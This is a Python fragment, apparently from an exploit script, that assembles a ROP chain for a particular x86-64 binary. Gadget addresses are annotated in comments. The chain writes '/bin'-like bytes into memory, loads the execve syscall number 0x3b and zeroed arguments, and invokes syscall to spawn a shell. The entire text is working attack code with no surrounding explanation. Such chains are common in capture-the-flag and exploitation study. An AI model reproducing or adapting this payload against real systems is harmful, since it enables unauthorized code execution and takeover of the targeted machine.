payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49f070)+p64(0x47fb78)
# 0x000000000047fb78: pop rdx; ret; 
payload += p64(0x6e69622f)+p64(0x43c025)
# 0x000000000043c025: add dword ptr [rdi], edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49f074)+p64(0x47fb78)
# 0x000000000047fb78: pop rdx; ret; 
payload += p64(0x68662f)+p64(0x43c025)
# 0x000000000043c025: add dword ptr [rdi], edx; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x49f070)+p64(0x479b6e)
# 0x0000000000479b6e: pop rsi; ret; 
payload += p64(0x0)+p64(0x47fb78)
# 0x000000000047fb78: pop rdx; ret; 
payload += p64(0x3b)+p64(0x41d6c4)
# 0x000000000041d6c4: xchg eax, edx; ret; 
payload += p64(0x47fb78)
# 0x000000000047fb78: pop rdx; ret; 
payload += p64(0x0)+p64(0x43ce68)
# 0x000000000043ce68: syscall; 
payload += b''
